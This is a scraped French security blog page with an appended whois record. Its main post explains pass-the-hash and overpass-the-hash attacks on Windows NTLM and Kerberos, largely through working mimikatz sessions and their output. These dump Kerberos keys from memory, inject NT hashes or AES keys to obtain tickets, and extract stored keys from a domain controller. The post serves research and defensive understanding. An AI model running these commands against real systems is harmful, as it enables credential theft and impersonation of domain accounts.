HtmlToText
blog de gentil kiwi l'aide mémoire d'un kiwi recherche menu principal aller au contenu principal aller au contenu secondaire accueil kekeo mimikatz présentations programmes openssl pour windows socat windbg windows performance toolkit à propos navigation des articles ← articles plus anciens overpass-the-hash publié le 28/07/2014 par gentilkiwi 4 a quelques jours du blackhat et de la defcon, je profite de ce post pour donner quelques explication sur un petit billet twitter du mois d’avril. #mimikatz now makes "pass-the-hash" to obtain kerberos tickets from ntlm hash – download: https://t.co/mxfmkrxcob ! pic.twitter.com/nlue0qjc1v — benjamin delpy (@gentilkiwi) april 30, 2014 (il sera bien entendu abordé la conférence « abusing microsoft kerberos: sorry you guys don’t get it » avec skip ) pass-the-hash sous windows, la technique du « pass-the-hash » consiste à s’authentifier sur un serveur en utilisant le hash du mot de passe d’un utilisateur, plutôt que par le mot de passe lui même. les bases un serveur s’assure de l’identité d’un utilisateur en vérifiant sa connaissance d’un secret qu’ils partagent. grossièrement, le serveur envoi au client une données, un challenge , que le client devra chiffrer/hasher/… à partir du secret partagé : cela devient la réponse . si le serveur réussi à calculer la même réponse, ou à la déchiffrer à partir de sa connaissance du secret, c’est que le client possède le même secret . ces secrets sont sur les dc pour un domaine, sinon ils doivent être partagés dans la sam locale de chaque serveur. les secrets contrairement à ce qui pourrait être facilement imaginé, windows n’utilise pas le mot de passe de l’utilisateur comme secret partagé , mais des dérivés non réversibles : hash lm, ntlm, clés des, aes… selon le protocole utilisé, le secret et les algorithmes utilisés sont différents : protocole algorithme secret utilisé lm des-ecb hash lm ntlmv1 des-ecb hash nt ntlmv2 hmac-md5 hash nt dans le cas du protocole ntlm, le hash nt dérivé du mot de passe utilisateur est suffisant pour répondre au challenge du serveur. le mot de passe utilisateur est, lui, inutile dans sa forme originale. overpass-the-hash (pass-the-key) l’authentification via kerberos est un tantinet différente. le client chiffre un timestamp à partir de son secret utilisateur, éventuellement avec des paramètres de realm et un nombre d’itération envoyé du serveur. si le secret est le bon, le serveur peut déchiffrer le timestamp (et au passage vérifier que les horloges ne sont pas trop décalés dans le temps). protocole secret (clé) utilisé kerberos des rc4 = hash nt ! aes128 aes256 oui, la clé de type rc4, disponible et activé par défaut de xp à 8.1 reste notre hash nt ! jouons ces clés sont disponibles dans la mémoire du fournisseur kerberos. tout comme le mot de passe utilisateur, ces clés sont d’autant plus présentes qu’un tgt n’a pas encore été obtenu. mimikatz # privilege::debug privilege '20' ok mimikatz # sekurlsa::ekeys authentication id : 0 ; 239946 (00000000:0003a94a) session : interactive from 1 user name : administrateur domain : chocolate sid : s-1-5-21-130452501-2365100805-3685010670-500 * username : administrateur * domain : chocolate.local * password : (null) * key list : aes256_hmac b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 aes128_hmac 8451bb37aa6d7ce3d2a5c2d24d317af3 rc4_hmac_nt cc36cf7a8514893efccd332446158b1a rc4_hmac_old cc36cf7a8514893efccd332446158b1a rc4_md4 cc36cf7a8514893efccd332446158b1a rc4_hmac_nt_exp cc36cf7a8514893efccd332446158b1a rc4_hmac_old_exp cc36cf7a8514893efccd332446158b1a toutes les clés et mot de passe devraient même totalement disparaitre après l’obtention d’un tgt, puisqu’un tgt est autosuffisant pour se renouveler tout au long de sa durée de vie… – http://www.ietf.org/rfc/rfc4120.txt § 2.3 et si nous passion le hash ? mimikatz # privilege::debug privilege '20' ok mimikatz # sekurlsa::pth /user:administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a user : administrateur domain : chocolate.local program : cmd.exe ntlm : cc36cf7a8514893efccd332446158b1a | pid 2652 | tid 2656 | luid 0 ; 288235 (00000000:000465eb) \_ msv1_0 - data copy @ 0000000000311e10 : ok ! \_ kerberos - data copy @ 000000000035d8d8 \_ aes256_hmac -> null \_ aes128_hmac -> null \_ rc4_hmac_nt ok \_ rc4_hmac_old ok \_ rc4_md4 ok \_ rc4_hmac_nt_exp ok \_ rc4_hmac_old_exp ok \_ *password replace -> null cette fois ci le hash nt a été injecté dans le provider msv1_0 et kerberos, permettant de répondre aux challenges ntlm et d’obtenir un tgt kerberos… mais il est aussi possible de n’utiliser que la clé aes si besoin : mimikatz # sekurlsa::pth /user:administrateur /domain:chocolate.local /aes256:b7268361386090314acce8d9367e55f55865e7ef8e 670fbe4262d6c94098a9e9 user : administrateur domain : chocolate.local program : cmd.exe aes256 : b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 | pid 1652 | tid 548 | luid 0 ; 411133 (00000000:000645fd) \_ msv1_0 - data copy @ 0000000001675f70 : ok ! \_ kerberos - data copy @ 000000000161e118 \_ aes256_hmac ok \_ aes128_hmac -> null \_ rc4_hmac_nt -> null \_ rc4_hmac_old -> null \_ rc4_md4 -> null \_ rc4_hmac_nt_exp -> null \_ rc4_hmac_old_exp -> null \_ *password replace -> null cette fois ci, le protocole ntlm ne pourra pas être utilisé, seulement kerberos avec chiffrement aes256. des clés sur le dc afin de vérifier toute ces méthodes d’authentification, les dc doivent avoir sous la main de multiples clés pour chaques utilisateurs… nous connaissions le hash lm et le hash nt… mais comment obtenir les autres ? une nouvelle méthode mimikatz # privilege::debug privilege '20' ok mimikatz # lsadump::lsa /name:administrateur /inject domain : chocolate / s-1-5-21-130452501-2365100805-3685010670 rid : 000001f4 (500) user : administrateur * primary lm : ntlm : cc36cf7a8514893efccd332446158b1a * wdigest 01 bd9d09445aec3c116c9c8af35da604f5 [...] 29 d96ac7a2022d2ee01f441812e6450139 * kerberos default salt : chocolate.localadministrateur credentials des_cbc_md5 : f8fd987fa7153185 * kerberos-newer-keys default salt : chocolate.localadministrateur default iterations : 4096 credentials aes256_hmac (4096) : b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 aes128_hmac (4096) : 8451bb37aa6d7ce3d2a5c2d24d317af3 des_cbc_md5 (4096) : f8fd987fa7153185 téléchargement la version alpha prenant en charge ces améliorations est disponible : http://blog.gentilkiwi.com/mimikatz publié dans mimikatz | mots-clés : aes , kerberos , lm , ntlm , over pass the hash , pass the hash , rc4 | 4 réponses gentilkiwi @ blackhat 2014 – lv publié le 19/07/2014 par gentilkiwi 1 cette année, skip `alva` duckwall a eu la très gentille idée de m’inviter à présenter les nouveautés de mimikatz au sujet de kerberos! nous présenterons donc, ensemble, le 7 août à 11:45 dans la salle ‘south seas cd’ du mandalay bay à las vegas, « abusing microsoft kerberos: sorry you guys don’t get it » viendez donc nous voir ! j’aurais des stickers ;) j’essayerais aussi de passer une tête au talk de chris campbell : « the secret life of krbtgt » à la defcon! publié dans sécurité | mots-clés : blackhat , kerberos , passingthehash , skip `alva` duckwall | une réponse gentilkiwi @ eurotrash security podcast (épisode 48) publié le 14/07/2014 par gentilkiwi répondre il y a quelques semaines, chris john riley me proposait une petite interview pour eurotrash security , dans leur podcast, disponible sur soundcloud avec chris john riley , wicked clown et dale pearson , j’y ai abordé mimikatz , son histoire, ses fonctionnalités, etc… a écouter rapidement pour découvrir mon légendaire « frenglish ». heureusement que leur slogan est : « la sécurité avec de drôles d’accents » ;) publié dans sécurité | mots-clés : eurotrash , interview , mimikatz , soundcloud | laisser une réponse gentilkiwi @ rmll 2014 (libre software meeting 2014) publié le 13/06/2014 par gentilkiwi 2 christophe brocas m’a proposé u
Informations Whois
Whois est un protocole qui permet d'accéder aux informations d'enregistrement.Vous pouvez atteindre quand le site Web a été enregistré, quand il va expirer, quelles sont les coordonnées du site avec les informations suivantes. En un mot, il comprend ces informations;
Domain Name: GENTILKIWI.COM
Registry Domain ID: 444180213_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.1and1.com
Registrar URL: http://registrar.1and1.info
Updated Date: 2017-05-11T07:39:54Z
Creation Date: 2006-05-10T20:42:26Z
Registry Expiry Date: 2018-05-10T20:42:26Z
Registrar: 1&1 Internet SE
Registrar IANA ID: 83
Registrar Abuse Contact Email: abuse@1and1.com
Registrar Abuse Contact Phone: +1.6105601459
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: NS1.BDM.MICROSOFTONLINE.COM
Name Server: NS2.BDM.MICROSOFTONLINE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2017-08-31T06:08:15Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
REGISTRAR 1&1 Internet SE
SERVERS
SERVER com.whois-servers.net
ARGS domain =gentilkiwi.com
PORT 43
TYPE domain
RegrInfo
DOMAIN
NAME gentilkiwi.com
CHANGED 2017-05-11
CREATED 2006-05-10
STATUS
clientTransferProhibited https://icann.org/epp#clientTransferProhibited
NSERVER
NS1.BDM.MICROSOFTONLINE.COM 207.46.15.59
NS2.BDM.MICROSOFTONLINE.COM 157.56.81.41
REGISTERED yes
Go to top